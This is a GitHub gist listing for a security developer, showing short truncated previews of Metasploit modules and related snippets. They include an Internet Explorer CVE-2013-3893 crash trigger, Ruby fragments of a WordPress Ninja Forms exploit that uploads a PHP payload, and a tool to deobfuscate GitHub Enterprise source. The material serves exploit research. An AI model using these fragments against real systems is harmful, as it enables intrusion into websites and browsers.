sinn3r wchen-r7
wchen-r7
/ decrypt_github_enterprise.rb
Created
March 23, 2017 15:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/ruby | |
| # | |
| # This tool is only used to "decrypt" the github enterprise source code. | |
| # | |
| # Run in the /data directory of the instance. | |
| require "zlib" | |
| require "byebug" | |
| KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+ |
wchen-r7
/ os_js_testcase.html
Created
June 18, 2015 21:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| // Case matters, see lib/msf/core/constants.rb | |
| // All of these should match up with constants in ::Msf::HttpClients | |
| var clients_opera = "Opera"; | |
| var clients_ie = "MSIE"; | |
| var clients_ff = "Firefox"; | |
| var clients_chrome = "Chrome"; | |
| var clients_safari = "Safari"; |
wchen-r7
/ gist:cbb6b47f096eb4fd4a7c1c53d43d574f
Created
October 11, 2017 18:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am wchen-r7 on github. | |
| * I am wchenr7 (https://keybase.io/wchenr7) on keybase. | |
| * I have a public key whose fingerprint is 4D08 AF54 0F66 C184 3C7D 1942 8048 8089 2F97 A3F7 | |
| To claim this, I am signing this object: |
wchen-r7
/ cve_2013_3893_trigger.html
Created
September 30, 2013 01:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| function trigger() | |
| { | |
| var id_0 = document.createElement("sup"); | |
| var id_1 = document.createElement("audio"); | |
| document.body.appendChild(id_0); | |
| document.body.appendChild(id_1); | |
| id_1.applyElement(id_0); |
wchen-r7
/ gist:1b4e660484ac2434397dc94eb5e8bb25
Created
February 24, 2017 19:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| donkeu |
wchen-r7
/ gist:701269eaf9ce2c17ad3888e18ce12248
Last active
June 29, 2016 00:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def fetch_ninja_form_nonce | |
| uri = normalize_uri(target_uri.path, datastore['FORM_PATH']) | |
| res = send_request_cgi( | |
| 'method' => 'GET', | |
| 'uri' => uri | |
| ) | |
| puts res.body | |
| fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200 | |
| res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] |
wchen-r7
/ gist:f1eabf17cb1f9f5a655b879d42c39682
Last active
June 28, 2016 23:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def generate_mime_message(payload_name, nonce) | |
| puts "--- You have nonce: #{nonce.inspect}" | |
| data = Rex::MIME::Message.new | |
| data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"') | |
| data.add_part(nonce, nil, nil, 'form-data; name="security"') | |
| data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"") | |
| data | |
| end |
wchen-r7
/ gist:7047590
Created
October 18, 2013 20:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = NormalRanking | |
| include Msf::Exploit::Remote::HttpServer::HTML | |
| def initialize(info={}) | |
| super(update_info(info, | |
| 'Name' => "IE test", |
wchen-r7
/ gist:6774619
Created
October 1, 2013 06:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = NormalRanking | |
| include Msf::Exploit::Remote::HttpServer::HTML | |
| include Msf::Exploit::RopDb | |
| def initialize(info={}) | |
| super(update_info(info, |
wchen-r7
/ gist:3d8b95aa9f3e14df8d65
Created
December 9, 2015 04:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| load "./lib/msf/core/exploit/exe.rb" | |
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote |
NewerOlder